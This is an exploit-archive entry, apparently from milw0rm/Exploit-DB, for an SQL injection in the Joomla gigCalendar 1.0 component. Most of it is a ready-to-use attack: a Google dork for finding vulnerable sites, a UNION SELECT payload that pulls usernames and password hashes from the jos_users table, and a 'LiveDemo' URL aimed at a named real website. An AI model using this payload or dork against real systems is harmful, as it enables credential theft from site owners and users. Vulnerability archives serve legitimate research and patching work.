Joomla! Component gigCalendar 1.0 - SQL Injection

EDB-ID:

7746




Platform:

PHP

Date:

2009-01-13


#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_gigcal
--------------------------------------------------
#[!] Name          :  GigCalendar
#[!] creationDate  :  Dec 2005 
#[!] Created by    :  Graham Spice, David Richards 
#[!] AuthorEmail   :  capt@gigcalendar.net 
#[!] Site          :  www.gigcalendar.net
#[!] Version       :  1.0
#[!] Download      :  http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
###################################################


[-] Example:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]


[-] Exploit:
'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*


[-] LiveDemo: 
http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*&Itemid=37


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#[!] Free Palestine
##############################

# milw0rm.com [2009-01-13]